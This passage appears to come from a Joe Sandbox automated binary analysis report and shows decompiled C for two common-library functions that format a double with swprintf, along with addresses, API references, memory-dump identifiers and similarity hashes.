                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameName::
                                                                                              • String ID: A
                                                                                              • API String ID: 1333004437-3554254475
                                                                                              • Opcode ID: c9da4e2c6686649faab20038695d01b31fe5cfdc3f1d6bd83beac3d89f3e1a60
                                                                                              • Instruction ID: 370c61f1e26deafc674a22748379a2077d4701398dd6aaaeda1dd7ef7d1e079c
                                                                                              • Opcode Fuzzy Hash: c9da4e2c6686649faab20038695d01b31fe5cfdc3f1d6bd83beac3d89f3e1a60
                                                                                              • Instruction Fuzzy Hash: 12215BB0900209EFDF95EF98D490EECBF76FB54B48F408059E8566B256CB70A685CB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01361D6C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 58%
                                                                                              			E01361D6C(void* __ecx, intOrPtr _a4, long long _a8) {
				char _v8;
				long long _v12;
				wchar_t* _t9;
				wchar_t* _t14;
				int _t23;
				long long* _t25;

				_push(__ecx);
				_push(__ecx);
				_push(__ecx);
				asm("fst qword [ebp-0x8]");
				 *_t25 = _a8;
				_t14 = "%lf";
				_t2 = E0135B59C(0, 0, _t14, __ecx) + 1; // 0x1
				_t23 = _t2;
				_t9 = E0135B660(0x13a0b34, _t23);
				 *((long long*)(_t25 + 0x14)) = _v12;
				swprintf(_t9, _t23, _t14, 0x13a0b34, 0x13a0b34);
				_v8 = 0;
				_push(_v8);
				E01361CB8(_a4, _t9);
				return _a4;
			}









                                                                                              0x01361d6f
                                                                                              0x01361d70
                                                                                              0x01361d77
                                                                                              0x01361d79
                                                                                              0x01361d7c
                                                                                              0x01361d7f
                                                                                              0x01361d96
                                                                                              0x01361d96
                                                                                              0x01361d9a
                                                                                              0x01361da6
                                                                                              0x01361dac
                                                                                              0x01361db7
                                                                                              0x01361dbb
                                                                                              0x01361dbf
                                                                                              0x01361dcb

                                                                                              APIs
                                                                                              • ___swprintf_l.LIBCMT ref: 01361D89
                                                                                                • Part of subcall function 0135B59C: _vsnprintf.LEGACY_STDIO_DEFINITIONS ref: 0135B5AC
                                                                                              • swprintf.LIBCMT ref: 01361DAC
                                                                                                • Part of subcall function 0135B580: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0135B592
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l__vswprintf_c_l_vsnprintfswprintf
                                                                                              • String ID: %lf
                                                                                              • API String ID: 3672277462-2891890143
                                                                                              • Opcode ID: c03f89e356d3e3aa0ce9a09ec7d95575353e78f839170746a99443903db80e9e
                                                                                              • Instruction ID: eff257b3382d12e767d6d5b30eadb67783f0a2cc65ad49159563db2b9672d803
                                                                                              • Opcode Fuzzy Hash: c03f89e356d3e3aa0ce9a09ec7d95575353e78f839170746a99443903db80e9e
                                                                                              • Instruction Fuzzy Hash: 11F0CDB550000DBADB08AB98CC89EBFBA6CDB85658F114188FA4416240DB75AE0493B2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01361D10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 71%
                                                                                              			E01361D10(void* __ecx, intOrPtr _a4, long long _a8) {
				char _v8;
				wchar_t* _t9;
				wchar_t* _t14;
				int _t23;
				long long* _t25;

				_push(__ecx);
				_push(__ecx);
				 *_t25 = _a8;
				_t14 = "%lf";
				_t2 = E0135B59C(0, 0, _t14, __ecx) + 1; // 0x1
				_t23 = _t2;
				_t9 = E0135B660(0x13a0b34, _t23);
				 *((long long*)(_t25 + 0x14)) = _a8;
				swprintf(_t9, _t23, _t14, 0x13a0b34, 0x13a0b34);
				_v8 = 0;
				_push(_v8);
				E01361CB8(_a4, _t9);
				return _a4;
			}








                                                                                              0x01361d13
                                                                                              0x01361d1a
                                                                                              0x01361d1c
                                                                                              0x01361d1f
                                                                                              0x01361d36
                                                                                              0x01361d36
                                                                                              0x01361d3a
                                                                                              0x01361d46
                                                                                              0x01361d4c
                                                                                              0x01361d57
                                                                                              0x01361d5b
                                                                                              0x01361d5f
                                                                                              0x01361d6b

                                                                                              APIs
                                                                                              • ___swprintf_l.LIBCMT ref: 01361D29
                                                                                                • Part of subcall function 0135B59C: _vsnprintf.LEGACY_STDIO_DEFINITIONS ref: 0135B5AC
                                                                                              • swprintf.LIBCMT ref: 01361D4C
                                                                                                • Part of subcall function 0135B580: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0135B592
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l__vswprintf_c_l_vsnprintfswprintf
                                                                                              • String ID: %lf
                                                                                              • API String ID: 3672277462-2891890143
                                                                                              • Opcode ID: 2f4c3c0dde8f458d9cd9f263cfeb3c7ba69c09bb08691c51c4519f6eadbb20fd
                                                                                              • Instruction ID: 78a49293d2f5e7ddeb59bd389bc2a2364e25fcf4b424300c9d6f17d59f31dca8
                                                                                              • Opcode Fuzzy Hash: 2f4c3c0dde8f458d9cd9f263cfeb3c7ba69c09bb08691c51c4519f6eadbb20fd
                                                                                              • Instruction Fuzzy Hash: 24F0B4B510000DBADB04AB58CC85FBF7B6DDF8965CF118598FA451B240DB759E04D3B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%